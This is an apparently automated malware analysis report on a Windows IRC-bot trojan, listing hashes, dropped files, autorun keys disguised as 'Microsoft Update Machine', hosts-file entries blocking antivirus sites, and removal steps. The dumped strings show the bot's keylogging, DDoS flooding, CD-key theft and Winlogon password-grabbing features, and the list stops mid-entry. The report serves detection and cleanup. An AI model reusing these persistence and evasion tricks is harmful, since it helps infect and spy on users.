HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.MSIL.Androm.3 (B) (Emsisoft), Gen:Heur.MSIL.Androm.3 (AdAware), Rbot.YR, BackdoorIRC.YR, GenericIRCBot.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 49ee5b907e4b4b9d5aa0669d261f996b
SHA1: 6a05c73f19c6866da64a7d10b8e8593b70d85688
SHA256: e59820f41e2938495b4241d0832a432c432a4eea7a0c8ab35ba7a4d8767398b3
SSDeep: 12288:xD/Q56oYjW4ftG9 4UWMqBOgxnZKE1Xvvgf5UjzX:xD/5oYK4Es4UWMqVxnZr4f5sX
Size: 979039 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-25 19:48:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224
The Trojan injects its code into the following process(es):
LOIC.exe:1316
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
The process eohpsgi.exe:1660 makes changes in the file system.
The Trojan deletes the following file(s):
The process run.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)
The process Uncrypted.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
Registry activity
The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 AA DB 59 AA 83 B2 0D E3 86 81 DE 94 73 5D 5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uncrypted.exe" = "Uncrypted"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"LOIC.exe" = "Low Orbit Ion Cannon"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process eohpsgi.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 09 F4 E3 AE 09 AE E3 6C 56 4C 61 12 CC 83 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process LOIC.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 8D 73 0C C0 DB 47 C3 A5 75 11 7D 86 3A 9E 45"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process run.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F9 04 63 DA B1 E3 BA 55 2F 7F 5A BD 98 AA B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process Uncrypted.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 5D C0 A2 A7 B7 24 11 7A 37 DD C9 D1 2B C3 7E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Run.exe" = "run"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 9dbe2c1a0f3360af6a9e24b2b303113d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LOIC.exe |
| 363307d3a54e1c2d1107b1f53e8844b1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uncrypted.exe |
| 2e31f43c4028cf8520dca20a9cb8e55d | c:\WINDOWS\system32\eohpsgi.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 1122 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | virustotal.com |
| 127.0.0.1 | mcafee.com |
| 127.0.0.1 | avira.com |
| 127.0.0.1 | avast.com |
| 127.0.0.1 | symantec.com |
| 127.0.0.1 | clamwin.com |
| 127.0.0.1 | kaspersky.com |
| 127.0.0.1 | comodo.com |
| 127.0.0.1 | norton.com |
| 127.0.0.1 | avg.com |
| 127.0.0.1 | novirusthanks.org |
| 127.0.0.1 | virusscan.jotti.org |
| 127.0.0.1 | viruschief.com |
| 127.0.0.1 | fortiguard.com |
| 127.0.0.1 | bitdefender.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 0.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename: test-new1.exe
Internal Name: test-new1.exe
File Version: 0.0.0.0
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 0.0.0.0Legal Copyright: Legal Trademarks: Original Filename: test-new1.exeInternal Name: test-new1.exeFile Version: 0.0.0.0File Description: Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 963812 | 966656 | 5.0059 | e7c9c24e1ce22d4d81c0915e48e87b42 |
| .rsrc | 974848 | 680 | 4096 | 0.476044 | 89bbd7bcd3f28ac346308cdebc72b7f0 |
| .reloc | 983040 | 12 | 4096 | 0.011373 | b061c1f6fd5cfb56674648657757dc87 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
eohpsgi.exe_1660:
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
Invalid allocation size: %u bytes.
Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
%hs(%d) :
#File Error#(%d) :
#File Error#(%d) :
Data: %s
Data: %s
%s(%d) : %s
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
Second Chance Assertion Failed: File %s, Line %d
user32.dll
user32.dll
Debug %s!
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
Program: %s%s%s%s%s%s%s%s%s%s%s
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
portuguese-brazilian
portuguese-brazilian
ntpass
ntpass
NTPass
NTPass
mssql
mssql
MSSQL
MSSQL
%s: %d,
%s: %d,
Total: %d in %s.
Total: %d in %s.
[SCAN]: Current IP: %s.
[SCAN]: Current IP: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Failed to start server, error: .
[TFTP]: Failed to start server, error: .
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Failed to start server, error: .
[HTTPD]: Failed to start server, error: .
%d.%d.%d.%d
%d.%d.%d.%d
sendto() socket failed. sent = %d .
sendto() socket failed. sent = %d .
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: Failed to start worker thread, error: .
[SCAN]: Failed to start worker thread, error: .
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
%d. %s = %s
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
CDKey
CDKey
prvkey
prvkey
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
Microsoft Windows Product ID
Microsoft Windows Product ID
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Global Operations
Global Operations
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Techland\Chrome
Software\Techland\Chrome
Chrome
Chrome
base\mp\sof2key
base\mp\sof2key
nwncdkey.ini
nwncdkey.ini
Key1=
Key1=
Key2=
Key2=
Key3=
Key3=
%s\%s
%s\%s
%s CD Key: (%s).
%s CD Key: (%s).
DCC SEND %s %i %i %i
DCC SEND %s %i %i %i
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
\\%s\pipe\epmapper
\\%s\pipe\epmapper
[TFTP]: File transfer complete to IP: %s
[TFTP]: File transfer complete to IP: %s
[%s]: Exploiting IP: %s.
[%s]: Exploiting IP: %s.
w[TFTP]: File transfer complete to IP: %s
w[TFTP]: File transfer complete to IP: %s
ddos.syn
ddos.syn
ddos.ack
ddos.ack
ddos.random
ddos.random
[DDoS]: Send error: .
[DDoS]: Send error: .
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Files found: %d.
[FINDFILE]: Files found: %d.
Found: %s\%s
Found: %s\%s
NTDLL.DLL
NTDLL.DLL
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Only supported on Windows NT/2000.
[FINDPASS]: Only supported on Windows NT/2000.
MSGINA
MSGINA
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(N/A)).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(N/A)).
[HTTPD]: Error: server failed, returned: .
[HTTPD]: Error: server failed, returned: .
HTTP/1.0 200 OK
HTTP/1.0 200 OK
Content-Type: %s
Content-Type: %s
Date: %s %s GMT
Date: %s %s GMT
Last-Modified: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Expires: %s %s GMT
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Failed to start worker thread, error: .
[HTTPD]: Failed to start worker thread, error: .
PRIVMSG %s :Searching for: %s
PRIVMSG %s :Searching for: %s
Index of %sIndex of %sIndex of %s
Index of %s
Name Name Last Modified Last Modified Size Size Searching for: %s
Searching for: %s
Parent Directory Parent Directory %2.2d/%2.2d/M %2.2d:%2.2d %s
%2.2d/%2.2d/M %2.2d:%2.2d %s
PRIVMSG %s :%-31s %-21s
PRIVMSG %s :%-31s %-21s
%s%s/
%s%s/
">%s/
">%s/
%s %s - - PRIVMSG %s :%-31s %-21s (%s bytes)
PRIVMSG %s :%-31s %-21s (%s bytes)
">%s
">%s
%dk %dk PRIVMSG %s :Found %s Files and %s Directories
PRIVMSG %s :Found %s Files and %s Directories
%s %s HTTP/1.1
%s %s HTTP/1.1
Referer: %s
Referer: %s
Host: %s
Host: %s
[ICMP]: Error: socket() failed, returned: .
[ICMP]: Error: socket() failed, returned: .
[ICMP]: Error: setsockopt() failed, returned: .
[ICMP]: Error: setsockopt() failed, returned: .
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[IDENTD]: Client connection from IP: %s:%d.
[IDENTD]: Client connection from IP: %s:%d.
: USERID : UNIX : %s
: USERID : UNIX : %s
[IDENTD]: Error: server failed, returned: .
[IDENTD]: Error: server failed, returned: .
PRIVMSG
PRIVMSG
%s %s :%s
%s %s :%s
[%d-%d-%d %d:%d:%d] %s
[%d-%d-%d %d:%d:%d] %s
[KEYLOG]: %s
[KEYLOG]: %s
%s (Changed Windows: %s)
%s (Changed Windows: %s)
%s (Buffer full) (%s)
%s (Buffer full) (%s)
%s (Return) (%s)
%s (Return) (%s)
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
GetKeyState
GetKeyState
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
gdi32.dll
gdi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
InternetCrackUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
icmp.dll
icmp.dll
netapi32.dll
netapi32.dll
dnsapi.dll
dnsapi.dll
iphlpapi.dll
iphlpapi.dll
mpr.dll
mpr.dll
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
odbc32.dll
odbc32.dll
SQLDriverConnect
SQLDriverConnect
SQLSetEnvAttr
SQLSetEnvAttr
SQLExecDirect
SQLExecDirect
SQLAllocHandle
SQLAllocHandle
SQLFreeHandle
SQLFreeHandle
SQLDisconnect
SQLDisconnect
avicap32.dll
avicap32.dll
Kernel32.dll failed.
Kernel32.dll failed.
User32.dll failed.
User32.dll failed.
Advapi32.dll failed.
Advapi32.dll failed.
Gdi32.dll failed.
Gdi32.dll failed.
Ws2_32.dll failed.
Ws2_32.dll failed.
Wininet.dll failed.
Wininet.dll failed.
Icmp.dll failed.
Icmp.dll failed.
Netapi32.dll failed.
Netapi32.dll failed.
Dnsapi.dll failed.
Dnsapi.dll failed.
Iphlpapi.dll failed.
Iphlpapi.dll failed.
Mpr32.dll failed.
Mpr32.dll failed.
Shell32.dll failed.
Shell32.dll failed.
Odbc32.dll failed.
Odbc32.dll failed.
Avicap32.dll failed.
Avicap32.dll failed.
Windows for Workgroups 3.1a
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
